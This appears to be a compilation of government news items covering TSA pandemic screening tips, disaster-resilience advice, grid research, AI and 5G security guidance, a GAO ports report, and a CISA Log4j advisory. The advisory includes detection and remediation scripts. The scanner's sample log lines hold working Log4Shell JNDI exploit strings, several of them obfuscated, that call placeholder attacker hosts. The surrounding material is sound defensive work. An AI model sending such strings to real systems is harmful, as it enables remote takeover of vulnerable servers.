TSA leaders share tips to get through airport security during the pandemic

There are a handful of actions that travelers can take in an effort to get through Transportation Security Administration (TSA) airport checkpoints during the pandemic in ways that may help reduce the likelihood of contracting COVID-19.

While security is TSA’s top priority, the health and safety of TSA employees and the traveling public is of utmost importance. TSA remains in close communication with medical professionals, the CDC, and various government agencies as it continues to carry out its security mission during the pandemic.

Here are a few suggestions that TSA Federal Security Directors want to share with travelers who are scheduled to fly during the pandemic.

  • John Bambury, TSA Federal Security Director for John F. Kennedy International Airport: “You’ve heard it a thousand times—wear a mask. I wear a mask every single day at the airport, which is one of the top recommendations from the CDC. If you’re flying, you should also consider carrying an extra mask so that if the elastic band snaps on your mask, you’ve got a spare one handy. Also, you may want to change into a fresh mask upon arrival at your destination. If you don’t have a mask, the TSA officer at the travel document checking podium will offer you one for free. When you get to the travel document podium, the TSA officer will ask you to remove your mask for just a few seconds to verify that your face matches the ID that you are presenting.”
  • Scott T. Johnson, TSA Federal Security Director for Washington Dulles International and Ronald Reagan Washington National Airports: “Consider enrolling in TSA PreCheck® because it gets you through the checkpoint conveniently and more quickly than a standard checkpoint lane, making it even more valuable in today’s travel climate. TSA PreCheck passengers spend less time waiting in line and keep their shoes, belts and jackets on during screening and electronics in their carry-ons, reducing overall contact during screening. Travelers in the program also are permitted to leave their 3-1-1 liquids bag in their carry-on bags.”
  • Gerardo Spero, TSA Federal Security Director for Philadelphia International Airport: “Know before you go. By that I mean that you need to know what is in your carry-on bag before you head to the airport to ensure that you have nothing prohibited with you. Prohibited items such as large liquids, knives, pepper spray, loose ammunition, and other prohibited items result in our need to open your carry-on bag and remove them. This keeps you in the checkpoint for an extra few minutes while one of our TSA officers opens your carry-on to search and eventually remove the item. We want to get you through the security checkpoint efficiently and quickly. Prohibited items slow you down.”
  • Thomas Carter, TSA Federal Security Director for Newark Liberty International Airport: “The CDC recommends washing your hands frequently. Consider washing your hands before and after completing the security screening process. If it is not possible to wash your hands, please use hand sanitizer. TSA has instituted a temporary exemption from the 3-1-1 rule that permits travelers to carry up to one 12-ounce container of liquid hand sanitizer per passenger in carry-on bags. You can also bring individual hand wipes or a large tub of hand wipes with you to help wipe down your hands and even the handles of your carry-on bags.”
  • John C. Allen, TSA Federal Security Director for Yeager Airport: “Do your best to socially distance from others whenever possible. By that I mean, leave some extra space between the traveler in line ahead of you. Take that an extra step back. After you go through the checkpoint scanner, that’s another opportunity to take an extra step back while you wait for your carry-on items along the conveyor belt. Look around, see where you can wait for your carry-on items a little farther away from fellow passengers. Then take your belongings off to the side to put on your shoes, jacket and other items so that you’ve got some extra space of your own to recompose.”
  • Grant Goodlett, TSA Federal Security Director for Baltimore/Washington International-Thurgood Marshall Airport: “If you haven’t traveled in a while, you will notice that TSA has installed acrylic shields in checkpoints in an effort to make the screening process safer for passengers and our workforce by reducing the potential of exposure to the coronavirus. Please don’t walk around these acrylic shields to interact with our TSA officers. The shields have small vents to allow for conversation, questions and answers to be shared.”

[Source: TSA]

How Parliamentarians can L.A.B.O.R. for disaster resilience

While hazards may be natural, disasters are not. The choices we make can either increase or decrease risk. As the planet slowly warms, parliamentarians can help. Indeed, they can L.A.B.O.R. for resilience.

The global pandemic caused by Covid-19 has been a wake-up call for the whole world. Appalling losses of life, economic devastation and ripples of insecurity have touched every corner of the planet. No one has been immune, and the power (or lack thereof) of the state to prevent, prepare and respond has been severely tested. While there’s no way to guess how the pandemic would have unfolded had the world been more prepared, research repeatedly shows that disaster risk reduction and preparedness mitigate losses by large margins. Just 24 hours’ warning of a coming storm or heat wave can cut the ensuing damage by 30 percent.

While public tolerance for risk is decreasing, citizens around the world are increasingly exposed to growing and compounded risks, with losses now reaching between $250 and $300 billion annually, up from about $50 billion in the 1980s. Climate change interacts with other hazards (technological, biological, chemical and geopolitical, among others), which creates greater risk complexity. The impacts of disaster know no bounds, but those living in more vulnerable circumstances tend to be the hardest hit, with poorer countries registering the highest post-disaster mortality rates.

While hazards may be natural, disasters are not

Floods, earthquakes, landslides or storms become disasters because of the exposure and vulnerability of people and places. The choices we make can either increase or decrease risk. Therefore, each stakeholder has a role in reducing disaster risk. Parliamentarians are uniquely situated to help societies weather all kinds of disasters with more resilience and preparation. Last year, the United Nations Office for Disaster Risk Reduction (UNDRR) and the Inter-Parliamentary Union (IPU) launched a toolkit for parliamentarians detailing how they can help build resilience for their communities. The guidance features ten recommendations grouped into five categories: Legislate; Advocate; Budget; Oversee; Represent (L.A.B.O.R.).

Read below for a snapshot of how parliamentarians can L.A.B.O.R. for their constituency’s resilience.

Legislate
Creating legislation is one of parliamentarians’ key jobs. In this regard, using risk and vulnerability assessments, they can create both DRR (disaster risk reduction) legislation, as well as amend existing legislation to reflect and support international DRR commitments.

Advocate
Parliamentarians can advocate for governments to shift from their current event-centered, response and recovery approach to DRR to a multi-hazard approach that considers vulnerability. They can also advocate for the use of data, expertise and experience from national and international institutions, as well as from other countries, to inform their own DRR frameworks and strategies. Finally, parliamentarians can advocate for DRR to be integrated into climate change plans and initiatives.

Budget (and finance)
Determining budget allocation is another vital task for parliamentarians and here they can focus on funding long-term DRR initiatives – including allocating funds for the oversight of data collection, reporting purposes and regulation enforcement – at all levels of government. Parliamentarians can also integrate and mainstream DRR into public and private investment decisions, ensuring that investments are risk-informed.

Oversee
Accountability is an important aspect of any government investment decision. Parliamentarians can use their oversight role to evaluate government performance, effectiveness and spending for DRR initiatives, thus demonstrating their effectiveness. They can also make people aware of the impacts of regulation, enforcement and penalties. In order to support ease of use and to compare different initiatives, parliamentarians can ensure information is provided in standardized, consistent formats.

Represent
Finally, as elected officials, parliamentarians are responsible for representing all of their constituents and ensuring that DRR policies and plans meet their specific needs. This all-of-society approach must include those most vulnerable in disasters: the poor, women, girls, ethnic minorities and persons with disabilities. Parliaments can ensure that DRR strategies and commitments are durable and will survive electoral changes by using a non-partisan, holistic approach to developing DRR plans.

Using the L.A.B.O.R. framework, parliamentarians can help create disaster-ready communities, both saving lives and protecting economic resources.

[Source: UNDRR]

Balance of Power - Building a Resilient Electric Grid

In early September, Hurricane Ida caused a massive blackout, leaving New Orleans in the dark for more than two days. A month before Ida, Tropical Storm Henri cut power to 100,000 households in Rhode Island. The wildfires in the western United States are common sources of blackouts in California. And earlier this year in Central Texas, harsh winter conditions led to a breakdown of the state’s electric grid, leaving one million people without heat and electricity for days.

These types of events are increasing in frequency as the nation’s infrastructure ages and climate change leads to extreme weather events. Hotter, wetter summers and harsher winters require more reliance on heating and cooling utilities, placing higher stress on the nation’s electric grid. For nearly a decade and a half, the Science and Technology Directorate (S&T) has teamed up with industry and one of the nation’s largest (and windiest) cities to study how technology can ‘help keep the lights on’ during emergencies. This fall, S&T and its partners announced the fruits of this labor: the successful installation and operation of the Resilient Electric Grid (REG) system in Chicago.

How the Electric Grid Works

[Figure: a simplified arrangement of the U.S. grid system. Generation: electricity is generated at various kinds of power plants by utilities and independent power producers, with lines leading to a transmission substation. Transmission: the vital link between power production and power usage; transmission lines carry electricity at high voltages over long distances from power plants to communities and end at a substation. Distribution: electricity from transmission lines is reduced to lower voltages at substations, and distribution companies bring the power to homes, workplaces, farms and other buildings.]

The electric grid is a complex network that spans the creation of electricity at a power generation station to the delivery of electricity to the end user. To get from the generation site to the end user, often several (possibly hundreds of) miles away, electricity travels through the transmission system, which converts the very high voltage electricity generated by the power plant to lower voltages. The electricity is further stepped down in voltage through the distribution network as it gets closer to homes, businesses, and other facilities. Major urban communities have multiple distribution-level substations throughout the city to meet the electrical power needs of their population.

Ideally, these distribution substations would be interconnected, so if one substation fails for any reason, another can step in and provide electricity—like driving on a system of highways, streets, and roads where you have multiple routes that can get you to the same destination. In reality, however, distribution substations are not interconnected. This is a designed safety feature in the grid so that an issue at one substation, such as a fault current (a large spike in electric current), doesn’t cascade down through the system and impact other substations.

As a result of this setup, if a substation fails, the area that substation serves experiences a blackout. But what if we could remove the risk associated with connecting substations, so that in the event of a substation failure other substations could step in and “help” continue to deliver power, creating multiple paths for power to flow, just as traffic flows on the internet?

S&T Powered (and Empowered) a Solution

Finding a solution to increase grid resilience inspired S&T to launch its REG project back in 2007. The project built on the Department of Energy’s (DOE) previous research on High Temperature Superconducting (HTS) cables.

S&T’s Sarah Mahmood, an electrical engineer, led the S&T project team in collaboration with American Superconductor (AMSC), a leading system provider of megawatt-scale power resiliency solutions.

Together, the team developed REG systems featuring cable systems that utilize AMSC’s proprietary Amperium® HTS technology designed to suppress surges while providing the ability to connect substations without risking a cascading fault current.

“Substations are usually not connected because of the risk of fault currents. It’s like a surge. In your house, you use a surge protector. If you don’t have protection against fault currents, you risk damaging the equipment downstream. But because they’re not connected, they lack resiliency,” Mahmood explained.

How a Superconductor Works

HTS cables use liquid nitrogen to keep the cable cool enough to function in a superconducting state. If the HTS cable experiences a fault, the fault creates energy that heats up the system so that it is no longer in a superconducting state, essentially turning itself off automatically, like a switch, and preventing equipment damage. What’s more, because HTS cables are superconducting, there is very little resistance or loss of power over the length of the cable, making them more efficient than traditional power cables, which lose power over distance.

After years of research, development and lab testing to prove the concept of a fault-current-limiting high temperature superconducting cable, S&T and AMSC partnered with Commonwealth Edison (ComEd), the largest electric utility in Illinois, serving over four million customers, to integrate the technology in the grid.

“S&T is grateful for the partnership with ComEd enabling us to install the REG system in the grid as a permanent asset, hopefully setting a pathway for broader market adoption of this new capability by industry as a potential solution to increase grid resilience,” Mahmood explained.

“The successful integration of the REG system is a major milestone in our efforts to enhance our service to customers through innovation,” said Terence R. Donnelly, President and COO of ComEd. “The increasingly frequent and severe weather events associated with climate change and the need for enhanced cyber and physical security require grid investments that will sustain the high levels of safe and reliable power that our customers depend on.”

HTS Technology Brings Resiliency to Power Grid Operations

A stable homeland is dependent on the reliable delivery of electricity—from public health to the economy and national security. According to DOE's Grid Modernization and the Smart Grid project, there are more than 9,200 electric generating units with more than 1 million megawatts of generating capacity feeding more than 600,000 miles of transmission lines that comprise the U.S. electric grid.

“Our superconductor-based REG system improved the reliability and resiliency of the grid, reducing disruption to public infrastructure and saving money for utility customers—all in an environmentally-friendly manner,” said Daniel P. McGahn, Chairman, President & CEO, AMSC. “We believe this accomplishment opens opportunities for AMSC to deploy REG systems to other innovative utilities.”

On September 30, DHS and DOE participated in a ribbon-cutting in Chicago to highlight the REG system installation into the ComEd grid. ComEd is the first utility in the United States to permanently install the AMSC REG system into the grid and will evaluate connecting it to multiple substations in order to create a back-up system for continuous power delivery even with a disruption to the power grid.

“S&T will continue to monitor the REG system’s performance with hopes for future commercialization, as other utilities look to increase grid resiliency,” said Mahmood.

According to a DOE study, the United States loses nearly $70 billion each year from power outages. S&T’s continued research and development efforts aim to enhance the nation’s overall energy resilience, so future generations can keep the lights on.

[Article source: DHS S&T]

Artificial Intelligence: How to make Machine Learning Cyber Secure

Machine learning (ML) is currently the most developed and the most promising subfield of artificial intelligence for industrial and government infrastructures. By providing new opportunities to solve decision-making problems intelligently and automatically, artificial intelligence (AI) is applied in almost all sectors of our economy.

While the benefits of AI are significant and undeniable, the development of AI also induces new threats and challenges, identified in the ENISA AI Threat Landscape.

How to prevent machine learning cyberattacks? How to deploy controls without hampering performance? The European Union Agency for Cybersecurity answers the cybersecurity questions of machine learning in a newly published report.

Machine learning algorithms are used to give machines the ability to learn from data in order to solve tasks without being explicitly programmed to do so. However, such algorithms need extremely large volumes of data to learn. And because they do, they can also be subjected to specific cyber threats.

The Securing Machine Learning Algorithms report presents a taxonomy of ML techniques and core functionalities. The report also includes a mapping of the threats targeting ML techniques and the vulnerabilities of ML algorithms. It provides a list of relevant security controls recommended to enhance cybersecurity in systems relying on ML techniques. One of the challenges highlighted is how to select the security controls to apply without jeopardising the expected level of performance.

The mitigation controls for ML specific attacks outlined in the report should in general be deployed during the entire lifecycle of systems and applications making use of ML.

Machine Learning Algorithms Taxonomy

Based on desk research and interviews with the experts of the ENISA AI ad-hoc working group, a total of 40 most commonly used ML algorithms were identified. The taxonomy developed is based on the analysis of such algorithms.

The non-exhaustive taxonomy devised is meant to support the process of identifying which specific threats target ML algorithms, what the associated vulnerabilities are, and which security controls are needed to address those vulnerabilities.

The EU Agency for Cybersecurity continues to play a bigger role in the assessment of Artificial Intelligence (AI) by providing key input for future policies. The Agency takes part in the open dialogue with the European Commission and EU institutions on AI cybersecurity and regulatory initiatives to this end.

ESF Members, NSA and CISA publish the fourth installment of 5G cybersecurity guidance

The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) published the fourth installment on securing integrity of 5G cloud infrastructures, Ensure Integrity of Cloud Infrastructure. As 5G networks and devices continue to increase in popularity, the importance of platform security to harden your systems against malicious cyber activity and persistence is apparent.

This guidance has been created by the Critical Infrastructure Partnership Advisory Council (CIPAC) Cross Sector Enduring Security Framework (ESF) Working Group, a public-private working group led by NSA and CISA that provides cybersecurity guidance addressing high-priority threats to the nation’s critical infrastructure.

Ensure Integrity of Cloud Infrastructure provides guidance on platform integrity, build-time security, launch-time integrity, and microservices infrastructure integrity. An industry trend has been to deploy a stand-alone 5G core using virtualized functions of microservices on an architecture that provides rapid enablement of services. It is imperative for device and system security that the underlying 5G cloud infrastructure platform on which microservices are deployed, or orchestrated, has been designed and built securely and continues operating as intended.

"A secure 5G core requires cybersecurity mitigations that are implemented at the foundation level and carried forward," said Jorge Laurel, NSA Project Director for ESF. "A secure underlying foundation ensures the services deployed on the network are done so on a secure infrastructure, which further strengthens the security of data across the network."

“The document provides actionable advice for 5G operators,” said Neal Ziring, NSA Cybersecurity Technical Director. “The fourth installment in the series covers an essential topic: integrity. Integrity is the most fundamental security property, and ensuring integrity from base hardware up through the software stack is critical for maintaining trustworthy 5G services.”

“The issues facing the cloud community, such as lateral movement to pod security and infrastructure integrity, are complex as are their solutions,” said Alaina Clark, Assistant Director of Stakeholder Engagement, CISA. “This series demonstrates the value of collaboration, spotlighting several cyber best practices that cloud providers, mobile network operators, and customers alike can implement for long-term security benefits. With our ESF government and industry associates, CISA will continue working with the Cloud and 5G communities to secure our Nation’s network infrastructure through partnership efforts like this.”

Maritime Infrastructure: Public Ports Engage in an Extensive Range of Activities beyond Freight Movement

Coastal, Great Lakes, and inland ports are critical to the U.S. economy. Aside from moving freight, ports across the U.S. have a variety of non-freight activities—like cruise ship and ferry terminals, commercial fishing, recreation, and commercial and residential development. Ports engage in non-freight activities to diversify business, find new uses for underused facilities, and contribute to community development.

Federal grant programs we reviewed provided some support to ports for these activities, with the Department of Transportation providing most funding for freight and non-freight projects.

Public ports across the U.S. pursue an extensive range of activities unrelated to freight movement. Examples of such non-freight activities include cruise ship and ferry terminals, commercial fishing, recreation, and commercial and residential development. In a GAO survey of ports, 67 of the 80 respondents reported being involved in non-freight activities in the last 10 years, with most respondents having a mix of freight and non-freight activities. Port officials said they pursue non-freight activities to diversify lines of business, find new uses for underused facilities, and address unmet community development needs, among other reasons. Non-freight activities can also have economic impacts including creating jobs, according to port stakeholders and economic impact studies. For example, one study estimated that commercial fishing activity at the Port of Seattle accounted for 11,300 jobs and generated $1.4 billion in total business output in 2017. Ports most commonly reported funding their non-freight activities with port revenues (55 survey respondents) or state funds (53 survey respondents).

Federal grant programs GAO reviewed have provided some funding to ports for non-freight projects but have largely focused on freight. According to GAO's analysis of federal grant award data for fiscal years 2010 through 2020, agencies provided at least $141 million to ports for non-freight projects during this time, or about 8 percent of the almost $1.9 billion in total funding these programs awarded to ports, in fiscal year 2020 dollars. The U.S. Department of Transportation (DOT) provided the majority of funding to ports for both freight and non-freight projects. DOT-funded non-freight projects include ferry-, cruise-, and fishing-related projects, among others. Stakeholders reported that ports, especially small ports, face challenges with federal grant programs. For example, stakeholders and federal officials said that many grant programs GAO reviewed are consistently oversubscribed and that smaller ports may lack the resources to develop a competitive application. Stakeholders GAO spoke with differed on the need for additional federal funding for non-freight activities.

The nation's coastal, Great Lakes, and inland ports have long been recognized as critical to the national and local economies. Ports can contribute not only by moving freight but also, for example, through activities related to tourism, transportation, or real estate. Nationwide port studies have typically focused on the impact of freight, and less attention has been paid to these non-freight activities.

House Report 116-452 included a provision for GAO to examine ports' non-freight activities. This GAO report describes (1) what is known about the nature of and funding for non-freight activities at public ports, and (2) the extent to which federal discretionary grant programs have provided funds to public ports for non-freight and freight projects, and stakeholders' views on this federal assistance.

To address the two objectives above, GAO conducted a non-generalizable survey of 80 ports and interviewed officials at 15 ports and 14 port industry stakeholders. GAO selected ports for variety based on their level of non-freight activity, freight traffic, and location, and whether they have applied for DOT funding. GAO also interviewed officials within DOT; the Departments of Commerce (Commerce), Defense, and Homeland Security; and the Environmental Protection Agency (EPA).

ESA and PSCE cooperate on Space Applications and Digital Transformation in Public Safety

The European Space Agency (ESA) and Public Safety Communication Europe (PSCE) are working together to support the emergence of space-based applications in the domain of public safety. Having jointly signed a Memorandum of Intent (MoI), the organisations will join efforts to support the emergence of applications that leverage secure satellite communications to address the needs of blue forces. ESA will launch a funding call early in 2022 to invite companies to develop and demonstrate digital services enabled by secure satcom solutions that address the urgent needs of public safety operators.

Security in space and on Earth are inextricably linked. The deployment of advanced satellite systems and their safe circulation in space are crucial for resilient and secure connectivity on Earth. As set out in its recently released vision for European space activities, ESA is stepping up its efforts to enable Europe to address new safety and security user needs, to make sure that our space programmes continue to be at the service of all citizens through Agenda 2025. ESA's Strategic Programme Line “Space Systems for Safety and Security (4S)” covers both, including applications for disaster preparedness, response and resilience, situational awareness, assessment of damage, and navigation-based services for tracking and coordinating rescue forces on-site and for emergency vehicles.

Through its ARTES (Advanced Research in Telecommunications Systems) programme, ESA is forging strong links between institutions, industries, and business to leverage the capabilities of space to drive digital services.

“I’m pleased to be working with PSCE to realise the potential of space to drive commercial solutions for secure satellite communication in public safety. This is a great example on how ESA is promoting the use of space technologies and applications to address safety and security needs expressed by the organisations operating in this domain. This collaboration will pave the way to the ESA Rapid and Resilient Crisis Response (R3) Accelerator,” says Rita Rinaldo, Head of the Partner-led and Thematic Initiatives Section, ESA Space Solutions.

CISA Issues Apache Log4j Vulnerability Guidance

CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam." Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.

Apache released Log4j version 2.15.0 in a security update to address the CVE-2021-44228 vulnerability. However, in order for the vulnerability to be remediated in products and services that use affected versions of Log4j, the maintainers of those products and services must implement this security update. Users of such products and services should refer to the vendors of these products/services for security updates. Given the severity of the vulnerability and the likelihood of an increase in exploitation by sophisticated cyber threat actors, CISA urges vendors and users to take the following actions.

Vendors
  • Immediately identify, mitigate, and patch affected products using Log4j.
  • Inform your end users of products that contain this vulnerability and strongly urge them to prioritize software updates.

Affected Organizations
  • In addition to the immediate actions—to (1) enumerate external-facing devices that have Log4j, (2) ensure your SOC acts on alerts from these devices, and (3) install a WAF with rules that automatically update—as noted in the box above, review CISA's upcoming GitHub repository for a list of affected vendor information and apply software updates as soon as they are available. See Actions for Organizations Running Products with Log4j below for additional guidance.
  • Note: CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog, which was created according to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. In accordance with BOD 22-01, federal civilian executive branch agencies must mitigate CVE-2021-44228 by December 24, 2021.

Technical Details

This RCE vulnerability—affecting Apache’s Log4j library, versions 2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables. According to the CVE-2021-44228 listing, affected versions of Log4j contain JNDI features—such as message lookup substitution—that "do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints."

An adversary exploits this vulnerability by submitting a specially crafted request to a vulnerable system, for example a JNDI lookup string placed in an HTTP header, query parameter, or form field that the application logs. When Log4j resolves the lookup, it contacts the adversary-controlled endpoint named in the string and loads what that endpoint returns, so the system executes arbitrary code of the adversary's choosing. This gives the adversary full control over the system, from which they can steal information, launch ransomware, or conduct other malicious activity.
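The following is an added example, not code from CISA or the Apache project, showing what such crafted requests look like once they land in a log and how to find them during a review. The log lines are constructed in combined access-log format (the IP addresses, hosts and paths are placeholders, not observed traffic). It resolves the nested `${lower:...}`, `${upper:...}` and `${...:-...}` lookups that attackers use to hide the literal `jndi` token, percent-decodes request URIs, and then reports the scheme and target of every lookup found, so a plain search for the string `jndi` would miss lines 3 and 4 but this does not.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format (not captured traffic).
# Lines 2-5 carry exploit strings in the User-Agent or query string; 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7:1099/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example.net%2Fd%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.11 - - [10/Dec/2021:12:00:06 +0000] "GET /?tpl=${HOME} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

# Log4j lookups that attackers nest to hide the literal "jndi" and "ldap" tokens.
# They are resolved innermost-first, as Log4j's substitutor would, so
# "${${lower:j}ndi:...}" collapses to "${jndi:...}".
_LOWER = re.compile(r"\$\{lower:([^}$]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^}$]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")   # "${anything:-v}" resolves to "v"
# Every attempt, once normalized, has this shape: ${jndi:<scheme>:[//]<target>}
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):(?://)?([^}]*)\}", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse nested lookup obfuscation; bounded so hostile input cannot spin."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return one finding per JNDI lookup string found, with the target it points at."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        decoded = unquote(raw)            # request URIs arrive percent-encoded
        normalized = normalize(decoded)
        for match in _JNDI.finditer(normalized):
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "target": match.group(2),
                "obfuscated": normalized != decoded,   # nested lookups were used
            })
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['scheme']} -> {f['target']}"
              + (" (obfuscated)" if f["obfuscated"] else ""))
```

The targets it extracts (here the placeholder 198.51.100.7 and exfil.example.net) are the adversary's callback servers and belong in the block list and in the compromise review; a line that is flagged as obfuscated is a deliberate attempt to evade string matching and should be weighted accordingly. Real log sources also need a second percent-decoding pass and a look at fields beyond the request line and User-Agent (usernames, form bodies, other headers), since anything the application logs is a vector.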
Actions for Organizations Running Products with Log4j

CISA recommends affected entities:

Review Apache’s Log4j Security Vulnerabilities page for additional information and, if appropriate, apply the provided workaround:
In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
For releases from 2.7 through 2.14.1 all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Apply available patches immediately. See CISA's upcoming GitHub repository for known affected products and patch information.

Prioritize patching, starting with mission critical systems, internet-facing systems, and networked servers. Then prioritize patching other affected information technology and operational technology assets.
Until patches are applied, set log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting your application. Note: this may change the behavior of a system's logging if it relies on Lookups for message formatting, and this mitigation only works for versions 2.10 and above. Treat it as a stopgap: Apache has since withdrawn this property as an incomplete mitigation, so removing the JndiLookup class from the classpath or upgrading remains the durable fix.
As stated above, BOD 22-01 directs federal civilian agencies to mitigate CVE-2021-44228 by December 24, 2021, as part of the Known Exploited Vulnerabilities Catalog.

Conduct a security review to determine whether there is a security concern or compromise. Because Log4j writes user-controlled strings into its output, the log files of any service using an affected version are where exploitation attempts (JNDI lookup strings in request headers, query parameters, usernames, and similar fields) will appear; search them as part of the review, and treat any callback hosts they name as indicators to block and investigate.
Consider reporting compromises immediately to CISA and the FBI.
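As an added example (not CISA's or Apache's code) of putting the version-specific workaround list above into practice, the script below inventories log4j-core jars, including one nested inside an application jar, reads the version each records, maps it to the workaround the advisory gives for that version range, and then applies the class-removal workaround to one jar in the same way the `zip -q -d` command does. The jars it scans are constructed in a temporary directory and contain only a version file and a few placeholder bytes standing in for the JndiLookup class; the version boundaries follow the advisory's list, with 2.7 treated as the start of the %m{nolookups} range.

```python
import io
import os
import re
import tempfile
import zipfile

# Entry names inside a real log4j-core jar; the jars built below are stand-ins.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
PRE_KIND = {"alpha": 0, "beta": 1, "rc": 2}


def parse_version(text):
    """Order Log4j 2.x versions: '2.0-beta9' < '2.0-rc1' < '2.0' < '2.10' < '2.14.1'."""
    base, _, pre = text.partition("-")
    nums = tuple(([int(p) for p in base.split(".")] + [0, 0])[:3])
    if not pre:
        return nums + (1, 0, 0)           # a final release sorts after its pre-releases
    m = re.match(r"([a-z]+)(\d*)", pre.lower())
    kind = PRE_KIND.get(m.group(1), 0) if m else 0
    num = int(m.group(2)) if m and m.group(2) else 0
    return nums + (0, kind, num)


AFFECTED_MIN, AFFECTED_MAX = parse_version("2.0-beta9"), parse_version("2.14.1")


def recommend(version, jndi_present):
    """Map a version to the advisory's per-version workaround. Returns (affected, advice)."""
    v = parse_version(version)
    if not (AFFECTED_MIN <= v <= AFFECTED_MAX):
        return False, "outside the affected range given in the advisory"
    if not jndi_present:
        return True, "JndiLookup.class already removed; still upgrade to 2.15.0 or later"
    if v >= parse_version("2.10"):
        return True, "set log4j2.formatMsgNoLookups=true until upgraded to 2.15.0 or later"
    if v >= parse_version("2.7"):
        return True, "use %m{nolookups} in every PatternLayout until upgraded to 2.15.0 or later"
    return True, "remove JndiLookup.class from the jar, then upgrade to 2.15.0 or later"


def inspect(zf):
    """Version recorded by log4j-core (None if this is not log4j-core) and JndiLookup presence."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode().splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    return version, JNDI_CLASS in names


def scan_jar(path):
    """Report log4j-core at the top level or nested one level down (uber/boot jars)."""
    results, base = [], os.path.basename(path)
    with zipfile.ZipFile(path) as zf:
        targets = [(base, zf)] + [
            (f"{base}!{n}", zipfile.ZipFile(io.BytesIO(zf.read(n))))
            for n in zf.namelist() if n.endswith(".jar")]
        for where, z in targets:
            version, present = inspect(z)
            if version:
                affected, advice = recommend(version, present)
                results.append({"where": where, "version": version, "jndi_present": present,
                                "affected": affected, "advice": advice})
    return results


def strip_jndi_lookup(path):
    """Same effect as `zip -q -d <jar> .../JndiLookup.class`: rewrite the jar without it."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)


def make_jar(path, version, nest_as=None):
    """Build a constructed stand-in jar (a few bytes, not real Log4j classes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    if nest_as:                                         # wrap inside an application jar
        with zipfile.ZipFile(path, "w") as outer:
            outer.writestr(nest_as, buf.getvalue())
    else:
        with open(path, "wb") as f:
            f.write(buf.getvalue())


def demo():
    """Scan three constructed jars, then apply the class-removal workaround to the oldest."""
    with tempfile.TemporaryDirectory() as d:
        old = os.path.join(d, "log4j-core-2.3.jar")
        make_jar(old, "2.3")
        make_jar(os.path.join(d, "log4j-core-2.15.0.jar"), "2.15.0")
        make_jar(os.path.join(d, "app.jar"), "2.14.1", nest_as="BOOT-INF/lib/log4j-core-2.14.1.jar")
        before = {r["where"]: r for f in sorted(os.listdir(d)) for r in scan_jar(os.path.join(d, f))}
        strip_jndi_lookup(old)
        after = scan_jar(old)[0]
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for r in list(before.values()) + [after]:
        print(f"{r['where']}: {r['version']} jndi={r['jndi_present']} -> {r['advice']}")
```

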